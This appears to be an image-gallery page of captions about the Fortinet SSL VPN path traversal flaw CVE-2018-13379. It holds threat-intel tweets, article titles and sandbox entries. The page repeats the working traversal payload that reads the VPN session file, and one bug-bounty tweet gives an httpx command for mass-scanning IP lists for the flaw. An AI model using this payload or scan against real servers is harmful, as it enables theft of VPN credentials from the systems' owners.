![Bad Packets by Okta on X: "⚠️ CVE-2018-13379 event detected ⚠️ Source IP: 195.133.31.89 (🇷🇺) Target: Fortinet VPN servers vulnerable to unauthenticated arbitrary file read leading to disclosure of usernames and passwords Bad Packets by Okta on X: "⚠️ CVE-2018-13379 event detected ⚠️ Source IP: 195.133.31.89 (🇷🇺) Target: Fortinet VPN servers vulnerable to unauthenticated arbitrary file read leading to disclosure of usernames and passwords](https://pbs.twimg.com/media/FMl6MwvVEAoz8g4.png)
Bad Packets by Okta on X: "⚠️ CVE-2018-13379 event detected ⚠️ Source IP: 195.133.31.89 (🇷🇺) Target: Fortinet VPN servers vulnerable to unauthenticated arbitrary file read leading to disclosure of usernames and passwords
![Critical vulnerabilities in Pulse Secure and Fortinet SSL VPNs in the Wild Internet | by Valeriy Shevchenko | Medium Critical vulnerabilities in Pulse Secure and Fortinet SSL VPNs in the Wild Internet | by Valeriy Shevchenko | Medium](https://miro.medium.com/v2/resize:fit:1400/1*hHr-Ese0bc70IN7_z3AptQ.png)
Critical vulnerabilities in Pulse Secure and Fortinet SSL VPNs in the Wild Internet | by Valeriy Shevchenko | Medium
![Malware analysis https://213.149.194.164/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession No threats detected | ANY.RUN - Malware Sandbox Online Malware analysis https://213.149.194.164/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession No threats detected | ANY.RUN - Malware Sandbox Online](https://content.any.run/tasks/69ecfeed-46e6-4931-b60e-1594a03be6c6/download/screens/e56f55fd-e04c-4393-a551-59e776b7ce0d/image.jpeg)
Malware analysis https://213.149.194.164/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession No threats detected | ANY.RUN - Malware Sandbox Online
![Malware analysis https://213.149.194.164/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession No threats detected | ANY.RUN - Malware Sandbox Online Malware analysis https://213.149.194.164/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession No threats detected | ANY.RUN - Malware Sandbox Online](https://content.any.run/tasks/69ecfeed-46e6-4931-b60e-1594a03be6c6/download/screens/12a9aa4c-a12c-4477-8ed5-425b54c3e2b1/image.jpeg)
Malware analysis https://213.149.194.164/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession No threats detected | ANY.RUN - Malware Sandbox Online
![Critical vulnerabilities in Pulse Secure and Fortinet SSL VPNs in the Wild Internet | by Valeriy Shevchenko | Medium Critical vulnerabilities in Pulse Secure and Fortinet SSL VPNs in the Wild Internet | by Valeriy Shevchenko | Medium](https://i.ytimg.com/vi/v7JUMb70ON4/maxresdefault.jpg)
Critical vulnerabilities in Pulse Secure and Fortinet SSL VPNs in the Wild Internet | by Valeriy Shevchenko | Medium
![Malware analysis https://213.149.194.164/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession No threats detected | ANY.RUN - Malware Sandbox Online Malware analysis https://213.149.194.164/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession No threats detected | ANY.RUN - Malware Sandbox Online](https://content.any.run/tasks/69ecfeed-46e6-4931-b60e-1594a03be6c6/download/screens/ec353cb4-5c8f-4e8a-9e2c-229b57d1f6a8/image.jpeg)
Malware analysis https://213.149.194.164/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession No threats detected | ANY.RUN - Malware Sandbox Online
![Bank Security on X: "The Threat Actor "pumpedkicks" shared a list of 49,577 IPs vulnerable to Fortinet SSL VPN CVE-2018-13379. The Actor also claims to have the clear text credentials associated with Bank Security on X: "The Threat Actor "pumpedkicks" shared a list of 49,577 IPs vulnerable to Fortinet SSL VPN CVE-2018-13379. The Actor also claims to have the clear text credentials associated with](https://pbs.twimg.com/media/EnMMSL3W4AEpPKS.png)
Bank Security on X: "The Threat Actor "pumpedkicks" shared a list of 49,577 IPs vulnerable to Fortinet SSL VPN CVE-2018-13379. The Actor also claims to have the clear text credentials associated with
EXPLOTACIÓN DE VULNERABILIDAD PATH TRAVERSAL CVE-2018-13379 FORTINET FORTIOS 6.0.0 – 6.0.4 / 5.6.3 – 5.6.7 PROPIETARIO Y
![Muhammed Anzil on Twitter: "Title :- A path traversal vulnerability in the FortiOS SSL VPN web portal CVE-2018-13379 🪲 httpx -l ips.txt -path "/remote /fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" -status-code -mc 200 #BugBounty ... Muhammed Anzil on Twitter: "Title :- A path traversal vulnerability in the FortiOS SSL VPN web portal CVE-2018-13379 🪲 httpx -l ips.txt -path "/remote /fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" -status-code -mc 200 #BugBounty ...](https://pbs.twimg.com/media/F0a3x2VXgAEW3Ad.png:large)